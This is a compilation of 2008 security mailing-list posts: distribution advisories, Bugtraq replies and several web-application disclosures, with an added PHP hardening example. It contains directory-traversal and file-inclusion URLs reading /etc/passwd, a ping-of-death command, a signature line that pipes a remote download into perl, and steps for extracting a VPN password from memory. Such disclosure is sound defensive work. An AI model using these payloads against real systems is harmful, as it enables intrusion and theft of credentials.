[ GLSA 200803-32 ] Wireshark: Denial of Service
Gentoo Linux Security Advisory                           GLSA 200803-32
http://security.gentoo.org/

  Severity: Normal
     Title: Wireshark: Denial of Service
      Date: March 24, 2008
      Bugs: #212149
        ID: 200803-32

Synopsis
========

Multiple Denial of Service vulnerabilities have been discovered in
Wireshark.

Background
==========

Wireshark is a network protocol analyzer with a graphical front-end.

Affected packages
=================

    -------------------------------------------------------------------
     Package                    /  Vulnerable  /              Unaffected
    -------------------------------------------------------------------
  1  net-analyzer/wireshark        < 0.99.8                   >= 0.99.8

Description
===========

Multiple unspecified errors exist in the SCTP, SNMP, and TFTP
dissectors.

Impact
======

A remote attacker could cause a Denial of Service by sending a
malformed packet.

Workaround
==========

Disable the SCTP, SNMP, and TFTP dissectors.

Resolution
==========

All Wireshark users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-analyzer/wireshark-0.99.8"

References
==========

  [ 1 ] CVE-2008-1070
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1070
  [ 2 ] CVE-2008-1071
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1071
  [ 3 ] CVE-2008-1072
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1072

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200803-32.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
[ GLSA 200803-31 ] MIT Kerberos 5: Multiple vulnerabilities
Gentoo Linux Security Advisory                           GLSA 200803-31
http://security.gentoo.org/

  Severity: High
     Title: MIT Kerberos 5: Multiple vulnerabilities
      Date: March 24, 2008
      Bugs: #199205, #212363
        ID: 200803-31

Synopsis
========

Multiple vulnerabilities have been found in MIT Kerberos 5, which could
allow a remote unauthenticated user to execute arbitrary code with root
privileges.

Background
==========

MIT Kerberos 5 is a suite of applications that implement the Kerberos
network protocol. kadmind is the MIT Kerberos 5 administration daemon,
KDC is the Key Distribution Center.

Affected packages
=================

    -------------------------------------------------------------------
     Package                    /  Vulnerable  /              Unaffected
    -------------------------------------------------------------------
  1  app-crypt/mit-krb5            < 1.6.3-r1                >= 1.6.3-r1

Description
===========

* Two vulnerabilities were found in the Kerberos 4 support in KDC: A
  global variable is not set for some incoming message types, leading
  to a NULL pointer dereference or a double free() (CVE-2008-0062) and
  unused portions of a buffer are not properly cleared when generating
  an error message, which results in stack content being contained in
  a reply (CVE-2008-0063).

* Jeff Altman (Secure Endpoints) discovered a buffer overflow in the
  RPC library server code, used in the kadmin server, caused when too
  many file descriptors are opened (CVE-2008-0947).

* Venustech AD-LAB discovered multiple vulnerabilities in the GSSAPI
  library: usage of a freed variable in the gss_indicate_mechs()
  function (CVE-2007-5901) and a double free() vulnerability in the
  gss_krb5int_make_seal_token_v3() function (CVE-2007-5971).

Impact
======

The first two vulnerabilities can be exploited by a remote
unauthenticated attacker to execute arbitrary code on the host running
krb5kdc, compromise the Kerberos key database or cause a Denial of
Service. These bugs can only be triggered when Kerberos 4 support is
enabled.

The RPC related vulnerability can be exploited by a remote
unauthenticated attacker to crash kadmind, and theoretically execute
arbitrary code with root privileges or cause database corruption. This
bug can only be triggered in configurations that allow large numbers of
open file descriptors in a process.

The GSSAPI vulnerabilities could be exploited by a remote attacker to
cause Denial of Service conditions or possibly execute arbitrary code.

Workaround
==========

Kerberos 4 support can be disabled via disabling the "krb4" USE flag
and recompiling the ebuild, or setting "v4_mode=none" in the
[kdcdefaults] section of /etc/krb5/kdc.conf. This will only work around
the KDC related vulnerabilities.

Resolution
==========

All MIT Kerberos 5 users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-crypt/mit-krb5-1.6.3-r1"

References
==========

  [ 1 ] CVE-2007-5901
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5894
  [ 2 ] CVE-2007-5971
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5971
  [ 3 ] CVE-2008-0062
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0062
  [ 4 ] CVE-2008-0063
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0063
  [ 5 ] CVE-2008-0947
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0947

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200803-31.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
[USN-590-1] bzip2 vulnerability
===========================================================
Ubuntu Security Notice USN-590-1             March 24, 2008
bzip2 vulnerability
CVE-2008-1372
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04
Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libbz2-1.0                      1.0.3-0ubuntu2.1

Ubuntu 6.10:
  libbz2-1.0                      1.0.3-3ubuntu0.1

Ubuntu 7.04:
  libbz2-1.0                      1.0.3-6ubuntu0.1

Ubuntu 7.10:
  libbz2-1.0                      1.0.4-0ubuntu2.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that bzip2 did not correctly handle certain malformed
archives. If a user or automated system were tricked into processing a
specially crafted bzip2 archive, applications linked against libbz2
could be made to crash, possibly leading to a denial of service.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/bzip2_1.0.3-0ubuntu2.1.diff.gz
      Size/MD5:    72067 9b73f1a1cbea8f8e7dfba9b0cd358bf3
    http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/bzip2_1.0.3-0ubuntu2.1.dsc
      Size/MD5:      833 180fa43bfd8645b2a0c353b8927961c4
    http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/bzip2_1.0.3.orig.tar.gz
      Size/MD5:   669075 8a716bebecb6e647d2e8a29ea5d8447f

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/bzip2_1.0.3-0ubuntu2.1_amd64.deb
      Size/MD5:   268000 b9532e26529bda8991e97cd819544aba
    http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/lib32bz2-1.0_1.0.3-0ubuntu2.1_amd64.deb
      Size/MD5:    38388 baf7e58f129b30288d0cf1f76df39255
    http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/lib32bz2-dev_1.0.3-0ubuntu2.1_amd64.deb
      Size/MD5:    30688 1c98274562642c9a3dee9bb91c070b5a
    http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/libbz2-1.0_1.0.3-0ubuntu2.1_amd64.deb
      Size/MD5:    40978 b904382cd76c9ffcd0dc92a5c3219a1a
    http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/libbz2-dev_1.0.3-0ubuntu2.1_amd64.deb
      Size/MD5:    32500 f6bf61f94fc0b4351fd79532df9025b1

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/bzip2_1.0.3-0ubuntu2.1_i386.deb
      Size/MD5:   265034 71b410100340e0df581c1dd8b5dfe316
    http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/lib64bz2-1.0_1.0.3-0ubuntu2.1_i386.deb
      Size/MD5:    35690 ad14744ff24eb1decb20995a7a9bbeb1
    http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/lib64bz2-dev_1.0.3-0ubuntu2.1_i386.deb
      Size/MD5:    29518 a835eb9af19b2c045393c8c4c483f51c
    http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/libbz2-1.0_1.0.3-0ubuntu2.1_i386.deb
      Size/MD5:    43012 4407f311343b9ca791aabf98bfdcd751
    http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/libbz2-dev_1.0.3-0ubuntu2.1_i386.deb
      Size/MD5:    32564 1b4dbd9a480cf4515cd7a7b64e1c215b

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/bzip2_1.0.3-0ubuntu2.1_powerpc.deb
      Size/MD5:   268616 c397d3782a2b937a84f05d39bbe0666d
    http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/lib64bz2-1.0_1.0.3-0ubuntu2.1_powerpc.deb
      Size/MD5:    39518 5dc92398adb2a55977e4aa395062deac
    http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/lib64bz2-dev_1.0.3-0ubuntu2.1_powerpc.deb
      Size/MD5:    33064 d8d02ff467de3cb1aa966d01d55bff63
    http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/libbz2-1.0_1.0.3-0ubuntu2.1_powerpc.deb
      Size/MD5:    43586 2c0696f8499181a13ca2c4a019972b9f
    http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/libbz2-dev_1.0.3-0ubuntu2.1_powerpc.deb
      Size/MD5:    33864 60dde6ba6b87d7bb261e04dfe1a89560

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/bzip2_1.0.3-0ubuntu2.1_sparc.deb
      Size/MD5:   266558 69f664880f5c2d982a7906c21d01b60d
    http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/lib64bz2-1.0_1.0.3-0ubuntu2.1_sparc.deb
      Size/MD5:    37524 1cc8f48aa7130c5d6523aa9be202b1d5
    http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/lib64bz2-dev_1.0.3-0ubuntu2.1_sparc.deb
      Size/MD5:    31480 9a826b5230f20fe079150562ab96d427
    http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/libbz2-1.0_1.0.3-0ubuntu2.1_sparc.deb
      Size/MD5:    40510 3a5787038eb631638918245f0ecb0460
    http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/libbz2-dev_1.0.3-0ubuntu2.1_sparc.deb
      Size/MD5:    32010 7a05d5fe1e1b4a90dfef111e01e6c661

Updated packages for Ubuntu 6.10:

  Source archives:

    http://security.ubuntu.com/ubun
[USN-591-1] libicu vulnerabilities
===========================================================
Ubuntu Security Notice USN-591-1             March 24, 2008
icu vulnerabilities
CVE-2007-4770, CVE-2007-4771
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04
Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libicu34                        3.4.1a-1ubuntu1.6.06.1

Ubuntu 6.10:
  libicu34                        3.4.1a-1ubuntu1.6.10.1

Ubuntu 7.04:
  libicu36                        3.6-2ubuntu0.1

Ubuntu 7.10:
  libicu36                        3.6-3ubuntu0.1

After a standard system upgrade you need to restart applications linked
against libicu, such as OpenOffice.org, to effect the necessary changes.

Details follow:

Will Drewry discovered that libicu did not properly handle '\0' when
processing regular expressions. If an application linked against libicu
processed a crafted regular expression, an attacker could execute
arbitrary code with privileges of the user invoking the program.
(CVE-2007-4770)

Will Drewry discovered that libicu did not properly limit its
backtracking stack size. If an application linked against libicu
processed a crafted regular expression, an attacker could cause a denial
of service via resource exhaustion. (CVE-2007-4771)


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/i/icu/icu_3.4.1a-1ubuntu1.6.06.1.diff.gz
      Size/MD5:    10972 445f415e082f042548258f4c6c232558
    http://security.ubuntu.com/ubuntu/pool/main/i/icu/icu_3.4.1a-1ubuntu1.6.06.1.dsc
      Size/MD5:      619 523a7f45138a6053c2603ed6eb480fca
    http://security.ubuntu.com/ubuntu/pool/main/i/icu/icu_3.4.1a.orig.tar.gz
      Size/MD5:  9039695 d45f59eb03b22cff127173cd3017f2e6

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/i/icu/icu-doc_3.4.1a-1ubuntu1.6.06.1_all.deb
      Size/MD5:  2915712 1101422b4eb7e5acdd12acc13336715a

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu34-dev_3.4.1a-1ubuntu1.6.06.1_amd64.deb
      Size/MD5:  5875030 1ae964fbf3734b1c00549de786e2bbba
    http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu34_3.4.1a-1ubuntu1.6.06.1_amd64.deb
      Size/MD5:  4792062 d7a03747efc590dfe4dea95158689d4f

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu34-dev_3.4.1a-1ubuntu1.6.06.1_i386.deb
      Size/MD5:  5699304 981af70894449430248adf3d9e0db9b6
    http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu34_3.4.1a-1ubuntu1.6.06.1_i386.deb
      Size/MD5:  4737488 6464d31ea0559635c6198dff1f4bf5bd

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu34-dev_3.4.1a-1ubuntu1.6.06.1_powerpc.deb
      Size/MD5:  6048294 ca2d43737af359f7eacd578e25e079ce
    http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu34_3.4.1a-1ubuntu1.6.06.1_powerpc.deb
      Size/MD5:  4941578 6cd24bc1bded8547014b75e34216ec4d

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu34-dev_3.4.1a-1ubuntu1.6.06.1_sparc.deb
      Size/MD5:  5943896 cf5fbe8f8aae07d732d96729647f174e
    http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu34_3.4.1a-1ubuntu1.6.06.1_sparc.deb
      Size/MD5:  4869890 71f8ee63a63ace3f17e77432cae0b4e7

Updated packages for Ubuntu 6.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/i/icu/icu_3.4.1a-1ubuntu1.6.10.1.diff.gz
      Size/MD5:    10981 810042a363ce70adbd4804b1e35ede3c
    http://security.ubuntu.com/ubuntu/pool/main/i/icu/icu_3.4.1a-1ubuntu1.6.10.1.dsc
      Size/MD5:      619 7ba7b3d16d5293cd6917d023a9978f6e
    http://security.ubuntu.com/ubuntu/pool/main/i/icu/icu_3.4.1a.orig.tar.gz
      Size/MD5:  9039695 d45f59eb03b22cff127173cd3017f2e6

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/i/icu/icu-doc_3.4.1a-1ubuntu1.6.10.1_all.deb
      Size/MD5:  2909022 aa55332464e3d391f414afaa8093f37f

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu34-dev_3.4.1a-1ubuntu1.6.10.1_amd64.deb
      Size/MD5:  5871754 160edb49c21f746f207e2b6d8f151067
    http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu34_3.4.1a-1ubuntu1.6.10.1_amd64.deb
      Size/MD5:  4786816 afd1356e6b85cab7d2f75747f8aa7d03

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu34-dev_3.4.1a-1ubuntu1.6.10.1_i386.deb
      Size/MD5:  5750086 f3742740fef98eaaafc5145c7e895a2e
    http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu34_3.4.1a-1ubuntu1.6.10.1_i386.deb
      Si
[SECURITY] [DSA 1528-1] New serendipity packages fix cross site scripting
--------------------------------------------------------------------------
Debian Security Advisory DSA-1528-1                    [EMAIL PROTECTED]
http://www.debian.org/security/                           Thijs Kinkhorst
March 24, 2008                        http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package        : serendipity
Vulnerability  : insufficient input sanitising
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2007-6205 CVE-2008-0124
BugTraq ID     : 28298
Debian Bug     : 469667

Peter Hüwe and Hanno Böck discovered that Serendipity, a weblog manager,
did not properly sanitise input to several scripts which allowed for
cross site scripting.

For the stable distribution (etch), this problem has been fixed in
version 1.0.4-1+etch1.

The old stable distribution (sarge) does not contain a serendipity
package.

For the unstable distribution (sid), this problem has been fixed in
version 1.3-1.

We recommend that you upgrade your serendipity package.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
-------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/s/serendipity/serendipity_1.0.4.orig.tar.gz
    Size/MD5 checksum:  3058582 eaf26277af3d864fc3d6bbc6c42a00b7
  http://security.debian.org/pool/updates/main/s/serendipity/serendipity_1.0.4-1+etch1.diff.gz
    Size/MD5 checksum:    21652 3de75c5011be95ffea76afe72ac2b598
  http://security.debian.org/pool/updates/main/s/serendipity/serendipity_1.0.4-1+etch1.dsc
    Size/MD5 checksum:      888 2f8a7d7009104ed9c7ca804c7b6a2b15

Architecture independent packages:

  http://security.debian.org/pool/updates/main/s/serendipity/serendipity_1.0.4-1+etch1_all.deb
    Size/MD5 checksum:  2756036 4b2b44137ed11caacba846c0761204f6

  These files will probably be moved into the stable distribution on
  its next update.

--------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: [EMAIL PROTECTED]
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
HIS-webshop is vulnerable against Directory-Traversal (www.shoppark.de)
HIS-Webshop is a shopping system written in Perl by www.shoppark.de. The script doesn't check the "t" parameter.

Example:

http://server.com/cgi-bin/his-webshop.pl?t=../../../../../../../../etc/passwd%00

<< Greetz Zero X >>
RE: hacking the mitsubishi GB-50A
> If you read your own post you would realize that Mitsubishi
> kept the device ipaddress prefix as 192.168.1 so only you
> can attack yourself.
> 192.168 cannot be access from the internet ;-)
> [unless you NAT at which point its your NAT config problem]

Wow, I'm glad to hear that machines with private addresses can't be attacked unless NAT is misconfigured. I'm also glad that we only have to worry about attacks coming directly from the Internet, and that our LANs are as safe as ever. I'll stop worrying about securing Intranet devices and applications, and use 192.168.1 addressing as my only security measure from now on.
Re: Linksys phone adapter denial of service
orsino wrote:
> There's a difference between being able to get onto a network (via wifi
> maybe?) and getting physical access to a device.

For starters this is a VoIP device (Product Name: SPA-2102), but even if it weren't it makes no difference to me, and in the security realm it shouldn't make a difference to anyone else either.

1) I don't have an open network, and if you do and are on this list it's either going to be a honeypot or for theft of information (bad guys roam this list too)

2) Think about how insanely stupid it would be to "go on a live network" then ping a VoIP device offline. What does this accomplish other than pure stupidity.

3) Where is the vendor contact information. Was this meant to be posted to Bugtrag or Fool Disclosure?

--
J. Oquendo
SGFA #579 (FW+VPN v4.1)
SGFE #574 (FW+VPN v4.1)

wget -qO - www.infiltrated.net/sig|perl

http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x3AC173DB
Re: Linksys phone adapter denial of service
There's a difference between being able to get onto a network (via wifi maybe?) and getting physical access to a device.

> [EMAIL PROTECTED] wrote:
>> Linksys phone adapter denial of service
>>
>> Product Information
>> Product Name: SPA-2102
>> Serial Number: FM500G582390
>> Software Version: 3.3.6
>> Hardware Version: 1.2.5(a)
>>
>> Another device hit with the PoD!
>>
>> ping -l 65500 192.168.0.1
>>
>> Only seems to work on the internal network.
>>
>> discovered by sipher
>>
>> http://core.ifconfig.se/~core/
>
> This is just as bad as the "pull the plug out of the device" since
> you're local attack. Is Linksys going to provide an epoxy fix for the
> plug?
Re: Re: Linksys phone adapter denial of service
No, but it's pretty sad that in 2008 a device is still vulnerable to this. I realize this is hardly an "attack". Uses are limited. Thanks.
Hamachi Password Disclosure Vulnerability
Hamachi VPN Client 1.0.2.5 Password Disclosure Vulnerability

1) Infos
--------

Date                   : 2008-03-24
Product                : Hamachi VPN Client 1.0.2.5
Version                : 1.0.2.5
Vendor                 : www.hamachi.it/
Vendor Status          : 2008-03-24 - Not Informed
Discovered/Provided By : Giuseppe `Evilcry` Bonfa' - http://evilcry.altervista.org
E-mail                 : evilcry[at]NOSPAM-gmail[dot]com

2) Security Issues
------------------

--- [ Password Disclosure Vulnerability ] ---

Hamachi is a client for trusted VPN tunneling. It has a password disclosure vulnerability: the user name and password are not protected against memory sniffing attacks, so a local attacker with a basic process memory dumper could obtain the connection password.

--- [ PoC ] ---

If a user has saved his/her own password, a malicious user can launch a process memory dumper, look through the dumped memory and, with a simple string search, retrieve the user name and password.

Useful keywords:

USERNAME
XCHAT_WARNING_IGNORE=

--- [ Patch ] ---

- No patch available from the vendor.
[DSECRG-08-021] Multiple LFI in PowerPHPBoard 1.00b
[DSECRG-08-021]                 Digital Security Research Group [DSecRG] Advisory

Application:             PowerPHPBoard
Versions Affected:       1.00b
Vendor URL:              http://www.powerscripts.org/
Bug:                     Multiple Local File Include
Exploits:                YES
Reported:                01.02.2008
Vendor Response:         none
Solution:                none
Date of Public Advisory: 24.03.2008
Author:                  Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

PowerPHPBoard has Multiple Local File Include vulnerabilities.

1. Local File Include vulnerability found in script footer.inc.php

To exploit this vulnerability the REGISTER_GLOBALS option must be ON in the php config file.

Code
####

    if ($settings[footer]) {
        if (file_exists("inc/$settings[footer]")) {
            include("inc/$settings[footer]");
        } else {
            echo "$lang_footerdoesntexists";
        }
    } else {
        include("inc/footer.ppb");
    }

####

Example:

http://[server]/[installdir]/footer.inc.php?settings[footer]=../../../../../../../../../../../../../etc/passwd

-----------------------------------------------------------------

2. Local File Include vulnerability found in script footer.inc.php

To exploit this vulnerability the REGISTER_GLOBALS option must be ON in the php config file.

Code
####

    if (!$handler) {
        if ($handler = @mysql_pconnect($mysql[server], $mysql[user], $mysql[password])) {
            ...
        }
    }

    ...

    $query = "SELECT * FROM ppb_config WHERE id='1'";
    $result = mysql_query($query,$handler);
    $num = mysql_num_rows($result);
    if ($num != 0) {
        list($settings[id], $settings[boardtitle], $settings[boardurl], $settings[adminemail],
             $settings[header], $settings[footer], $settings[bordercolor], $settings[tablebg1],
             $settings[tablebg2], $settings[tablebg3], $settings[htmlcode], $settings[bbcode],
             $settings[smilies], $settings[newthread], $settings[newpost], $settings[language])
            = mysql_fetch_array($result);
    }

    ...

    if ($settings[header]) {
        if (file_exists("inc/$settings[header]")) {
            include("inc/$settings[header]");
        } else {
            echo "$lang_headerfiledoesntexists";
        }
    } else {
        include("inc/header.ppb");
    }

####

Example:

http://[server]/[installdir]/header.inc.php?handler=1234&settings[header]=../../../../../../../../../../../../../etc/passwd

About
*****

Digital Security is a leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.

Contact: research [at] dsec [dot] ru
         http://www.dsec.ru (in Russian)

--
Alexandr Polyakov
DIGITAL SECURITY RESEARCH GROUP
mailto:[EMAIL PROTECTED]
[DSECRG-08-020] RFI-LFI in PowerClan 1.14a
[DSECRG-08-020]                 Digital Security Research Group [DSecRG] Advisory

Application:             PowerClan
Versions Affected:       1.14a
Vendor URL:              http://www.powerscripts.org/
Bug:                     Remote/Local File Include
Exploits:                YES
Reported:                01.02.2008
Vendor Response:         none
Solution:                none
Date of Public Advisory: ..2008
Author:                  Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

Remote/Local File Include vulnerability found in script footer.inc.php

To exploit this vulnerability the REGISTER_GLOBALS option must be ON in the php config file.

Code
####

    include($settings[footer]);

####

Example:

http://[server]/[installdir]/footer.inc.php?settings[footer]=../../../../../../../../../../../../../etc/passwd

About
*****

Digital Security is a leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.

Contact: research [at] dsec [dot] ru
         http://www.dsec.ru (in Russian)

--
Alexandr Polyakov
DIGITAL SECURITY RESEARCH GROUP
mailto:[EMAIL PROTECTED]
[DSECRG-08-019] LFI in PowerBook 1.21
Hello, bugtraq.

[DSECRG-08-031]                 Digital Security Research Group [DSecRG] Advisory

Application:             PowerBook
Versions Affected:       1.21
Vendor URL:              http://www.powerscripts.org/
Bug:                     Local File Include
Exploits:                YES
Reported:                01.02.2008
Vendor Response:         none
Solution:                none
Date of Public Advisory: ..2008
Author:                  Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

Local File Include vulnerability found in script pb_inc/admincenter/index.php

An unauthenticated user can access this script directly.

To exploit this vulnerability the REGISTER_GLOBALS option must be ON in the php config file.

Code
####

    if (!$page) {
        $page = "home";
    }
    $page .= ".inc.php";
    if(file_exists($page) == false) {
        echo " Sorry, the page $page does not exist! ";
    } else {
        include("$page");
    }

####

Example:

http://[server]/[installdir]/pb_inc/admincenter/index.php?page=../../../../../../../../../../../../../etc/passwd%00

About
*****

Digital Security is a leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.

Contact: research [at] dsec [dot] ru
         http://www.dsec.ru (in Russian)

--
Alexandr Polyakov
DIGITAL SECURITY RESEARCH GROUP
mailto:[EMAIL PROTECTED]
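The three DSecRG advisories above (PowerPHPBoard DSECRG-08-021, PowerClan DSECRG-08-020 and PowerBook DSECRG-08-019) share one root cause: a value that register_globals lets a request populate ($settings[footer], $settings[header], $page) reaches include() after at most a file_exists() check, so "../" components walk out of the intended directory and, in the PowerBook case, a trailing %00 cuts off the appended ".inc.php" suffix. The block below is an added example written for this digest, not code from the vendor, from DSecRG or from any of the three products; the template names in ALLOWED_TEMPLATES, the inc/ directory and the page query parameter are assumptions chosen to mirror the advisories, and it targets PHP 7.1 or later. It shows the confined include a maintainer would use in place of the quoted code:

```php
<?php
// Added example (not PowerPHPBoard/PowerClan/PowerBook code): a confined include
// that rejects the traversal and null-byte inputs shown in the advisories.
// Assumptions: an inc/ directory beside this script, and a fixed allowlist of
// template names (hypothetical names chosen for the example).

declare(strict_types=1);

// Only files the application itself ships may ever be included.
const ALLOWED_TEMPLATES = ['footer.ppb', 'header.ppb', 'home.inc.php'];

/**
 * Return the absolute path of an allowed template inside $baseDir, or null.
 * $name is untrusted: with register_globals on, a query parameter can populate
 * $settings[...] or $page directly, so nothing about it may be assumed.
 */
function resolve_template(string $name, string $baseDir): ?string
{
    // 1. Reject empty names and control characters, which covers the "%00"
    //    null byte used to truncate the appended ".inc.php" suffix.
    if ($name === '' || preg_match('/[\x00-\x1F]/', $name)) {
        return null;
    }

    // 2. Exact-match allowlist: no user-supplied path components at all,
    //    so "../" never reaches the filesystem.
    if (!in_array($name, ALLOWED_TEMPLATES, true)) {
        return null;
    }

    // 3. Defence in depth: resolve symlinks and ".." and confirm the result
    //    still lives under the template directory.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Read the selection from the request explicitly instead of relying on
// register_globals, and fall back to the default template.
$requested = (isset($_GET['page']) && is_string($_GET['page'])) ? $_GET['page'] : 'footer.ppb';
$template  = resolve_template($requested, __DIR__ . '/inc');

if ($template === null) {
    http_response_code(400);
    // Do not echo the attacker-controlled name back unescaped, as the
    // quoted "Sorry, the page $page does not exist!" message does.
    echo 'Unknown page';
    exit;
}

include $template;
```

The allowlist is the actual fix; the realpath() containment check only guards against a future allowlist entry that is itself a path. Reading $_GET explicitly removes the dependence on register_globals, which PHP 5.4 removed altogether, and PHP 5.3.4 and later reject filesystem paths that contain a null byte, but neither runtime change helps an installation still running the PHP versions these advisories assume, so the application-level check is what a maintainer should rely on.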
[SECURITY] [DSA 1527-1] New debian-goodies packages fix privilege escalation
--------------------------------------------------------------------------
Debian Security Advisory DSA-1527-1                    [EMAIL PROTECTED]
http://www.debian.org/security/                           Thijs Kinkhorst
March 24, 2008                        http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package        : debian-goodies
Vulnerability  : insufficient input sanitising
Problem type   : local
Debian-specific: yes
CVE Id(s)      : CVE-2007-3912
Debian Bug     : 440411

Thomas de Grenier de Latour discovered that the checkrestart tool in the
debian-goodies suite of utilities allowed local users to gain privileges
via shell metacharacters in the name of the executable file for a
running process.

For the stable distribution (etch), this problem has been fixed in
version 0.27+etch1.

